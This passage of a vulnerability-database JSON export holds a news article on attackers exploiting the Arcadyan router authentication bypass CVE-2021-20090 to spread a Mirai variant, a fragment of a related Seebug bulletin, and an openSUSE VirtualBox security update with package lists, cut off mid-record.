password>\u201c;\n\naddCfg(\"lan_ipaddr\", 0, \"192.168.11.1\");\n```\n\nSolution\nCustomers should seek update and mitigation information from their respective vendors.", "published": "2021-08-11T00:00:00", "modified": "2021-08-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.seebug.org/vuldb/ssvid-99329", "reporter": "Knownsec", "references": [], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-08-11T13:47:42", "history": [], "viewCount": 275, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20091", "CVE-2021-20092", "CVE-2021-20090"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-08-11T13:47:42", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-08-11T13:47:42", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "", "sourceData": "", "status": "cve,details", "_object_type": "robots.models.seebug.SeebugBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"]}], "thn": [{"id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "hash": "29f4015f89c28ca9c5aa04dc8368ac1a", "type": "thn", "bulletinFamily": "info", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "description": "[](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\n[](<https://go.thn.li/1-free-728-9> \"Stack Overflow Teams\" )\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\n[](<https://go.thn.li/auth_300> \"Enterprise Password Management\" )\n\nBesides CVE-2021\u201320090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * [CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-08-10T09:27:00", "modified": "2021-08-11T03:38:35", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "immutableFields": [], "lastseen": "2021-08-11T04:43:36", "history": [{"bulletin": {"id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "hash": "c625666d94ad42d5d4f293c1487f984f", "type": "thn", "bulletinFamily": "info", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "description": "[](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\n[](<https://go.thn.li/1-free-300-9> \"Stack Overflow Teams\" )\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\n[](<https://go.thn.li/auth_728> \"Enterprise Password Management\" )\n\nBesides CVE-2021\u201320090, the threat actor carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * [CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-08-10T09:27:00", "modified": "2021-08-10T09:27:54", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "immutableFields": [], "lastseen": "2021-08-10T10:34:38", "history": [], "viewCount": 47, "enchantments": {"dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF", "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "THREATPOST:3F4C590CA1F6027665DF96DF6D651032"]}, {"type": "attackerkb", "idList": ["AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "cve", "idList": ["CVE-2020-29557", "CVE-2021-22506", "CVE-2021-1498", "CVE-2021-31755", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22502"]}, {"type": "seebug", "idList": ["SSV:99255"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D", "RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976", "PACKETSTORM:162408"]}, {"type": "cisco", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "zdi", "idList": ["ZDI-21-153", "ZDI-21-154"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "thn", "idList": ["THN:3907AE12F794F0523BEE196D6543A50F", "THN:E5C91FC48CC9CB51116164A4422D17F8"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}], "modified": "2021-08-10T10:34:38", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-10T10:34:38", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-10T10:34:38", "differentElements": ["description", "modified"], "edition": 1}], "viewCount": 78, "enchantments": {"dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF", "THREATPOST:3F4C590CA1F6027665DF96DF6D651032"]}, {"type": "cve", "idList": ["CVE-2021-1497", "CVE-2021-22502", "CVE-2021-31755", "CVE-2021-20090", "CVE-2021-22506", "CVE-2021-1498", "CVE-2020-29557"]}, {"type": "attackerkb", "idList": ["AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244", "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}, {"type": "seebug", "idList": ["SSV:99329", "SSV:99255"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128", "RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976", "PACKETSTORM:162408"]}, {"type": "cisco", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR"]}, {"type": "zdt", "idList": ["1337DAY-ID-36171", "1337DAY-ID-36357"]}, {"type": "zdi", "idList": ["ZDI-21-154", "ZDI-21-153"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "thn", "idList": ["THN:3907AE12F794F0523BEE196D6543A50F", "THN:E5C91FC48CC9CB51116164A4422D17F8"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}], "modified": "2021-08-11T04:43:36", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-11T04:43:36", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.thn.ThnBulletin"]}], "suse": [{"id": "OPENSUSE-SU-2021:1114-1", "hash": "9a08ed8da817e7fb0fc5f1afe42e3951", "type": "suse", "bulletinFamily": "unix", "title": "Security update for virtualbox (important)", "description": "An update that solves four vulnerabilities and has two\n fixes is now available.\n\nDescription:\n\n This update for virtualbox fixes the following issues:\n\n Version bump to 6.1.26 (released July 28 2021 by Oracle)\n\n This is a maintenance release. The following items were fixed and/or added:\n\n - VMSVGA: fixed VM screen artifacts after restoring from saved state (bug\n #20067)\n - Storage: Fixed audio endianness for certain CUE sheet CD/DVD images.\n - VBoxHeadless: Running VM will save its state on host shutdown\n - VBoxManage: Fix OS detection for Ubuntu 20.10 ISO with unattended install\n - Linux Additions: Fixed mouse pointer offsetting issue for VMSVGA\n graphics adapter in multi-monitor VM setup (6.1.24 regression)\n\n Version bump to 6.1.24 (released July 20 2021 by Oracle)\n\n This is a maintenance release. The following items were fixed and/or added:\n\n - Storage: Fixed starting a VM if a device is attached to a VirtIO SCSI\n port higher than 30 (bug #20213)\n - Storage: Improvement to DVD medium change signaling\n - Serial: Fixed a the guest missing interrupts under certain circumstances\n (6.0 regression, bug #18668)\n - Audio: Multiple fixes and enhancements\n - Network: Fixed connectivity issue with virtio-net after resuming VM with\n disconnected link\n - Network: Fixed UDP GSO fragmentation issue with missing 8 bytes of\n payload at the end of the first fragment\n - API: Fixed VM configuration for recent Windows Server versions\n - Extension Pack: Fixed issues with USB webcam pass-through on Linux\n - Host and guest driver: Fix small memory leak (bug #20280)\n - Linux host and guest: Support kernel version 5.13 (bug #20456)\n - Linux host and guest: Introduce support for SUSE SLES/SLED 15 SP3\n kernels (bug #20396)\n - Linux host: Installer will not attempt to build kernel modules if system\n already has them installed and modules versions match current version\n - Guest Additions: Fixed crash on using shared clipboard (bug #19165)\n - Linux Guest Additions: Introduce support for Ubuntu specific kernels\n (bug #20325)\n - Solaris guest: Increased default memory and disk sizes\n - EFI: Support network booting with the E1000 network controller emulation\n - EFI: Stability improvements (bug #20090)\n\n - This release fixes boo#1188535, VUL-0: CVE-2021-2454, boo#1188536,\n VUL-0: CVE-2021-2409, boo#1188537, VUL-0: CVE-2021-2442, and\n boo#1188538, VUL-0: CVE-2021-2443.\n\n - Add vboximg-mount to packaging. boo#1188045.\n - Fixed CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT problem with kernel 5.13 as\n shown in boo#1188105.\n - Disable the build of kmp vboxvideo, at least temporarily.\n - Correct WantedBy entry in vboxadd-service\n - Require which for /usr/lib/virtualbox/vboxadd-service\n - fix license packaging, small cruft cleanup (avoid owning directories\n provided by filesystem rpm)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-1114=1", "published": "2021-08-10T04:17:31", "modified": "2021-08-10T04:17:31", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.5, "impactScore": 6.0}, "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/XVEDYTCL4HZ2BYHJLWW2ON7AOWMAGAVD/", "reporter": "Suse", "references": [], "cvelist": ["CVE-2021-2409", "CVE-2021-2442", "CVE-2021-2443", "CVE-2021-2454"], "immutableFields": [], "lastseen": "2021-10-24T14:26:30", "history": [], "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1114.NASL", "OPENSUSE-2021-1092.NASL", "VIRTUALBOX_JUL_2021_CPU.NASL"]}, {"type": "archlinux", "idList": ["ASA-202107-52"]}, {"type": "kaspersky", "idList": ["KLA12238"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1092-1"]}, {"type": "cve", "idList": ["CVE-2021-2454", "CVE-2021-2409", "CVE-2021-2443", "CVE-2021-2442"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-2442", "UB:CVE-2021-2454", "UB:CVE-2021-2443", "UB:CVE-2021-2409"]}, {"type": "zdi", "idList": ["ZDI-21-888"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2021"]}], "modified": "2021-10-23T02:26:22", "rev": 2}, "score": {"value": 4.7, "vector": "NONE", "modified": "2021-10-23T02:26:22", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "python3-virtualbox-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "python3-virtualbox"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "python3-virtualbox-debuginfo-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "python3-virtualbox-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-debuginfo-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-debugsource-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-debugsource"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-devel-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-devel"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-guest-tools-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-guest-tools"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-guest-tools-debuginfo-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-guest-tools-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-guest-x11-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-guest-x11"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-guest-x11-debuginfo-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-guest-x11-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-kmp-debugsource-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-kmp-debugsource"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26_k5.3.18_lp152.84-lp152.2.35.1", "packageFilename": "virtualbox-kmp-default-6.1.26_k5.3.18_lp152.84-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-kmp-default"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26_k5.3.18_lp152.84-lp152.2.35.1", "packageFilename": "virtualbox-kmp-default-debuginfo-6.1.26_k5.3.18_lp152.84-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-kmp-default-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26_k5.3.18_lp152.84-lp152.2.35.1", "packageFilename": "virtualbox-kmp-preempt-6.1.26_k5.3.18_lp152.84-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-kmp-preempt"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26_k5.3.18_lp152.84-lp152.2.35.1", "packageFilename": "virtualbox-kmp-preempt-debuginfo-6.1.26_k5.3.18_lp152.84-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-kmp-preempt-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-qt-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-qt"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-qt-debuginfo-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-qt-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-vnc-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-vnc"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-websrv-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-websrv"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-websrv-debuginfo-6.1.26-lp152.2.35.1.x86_64.rpm", "packageName": "virtualbox-websrv-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "noarch", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": "virtualbox-guest-desktop-icons-6.1.26-lp152.2.35.1.noarch.rpm", "packageName": "virtualbox-guest-desktop-icons"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "noarch", "operator": "lt", "packageVersion": "6.1.26-lp152.2.35.1", "packageFilename": 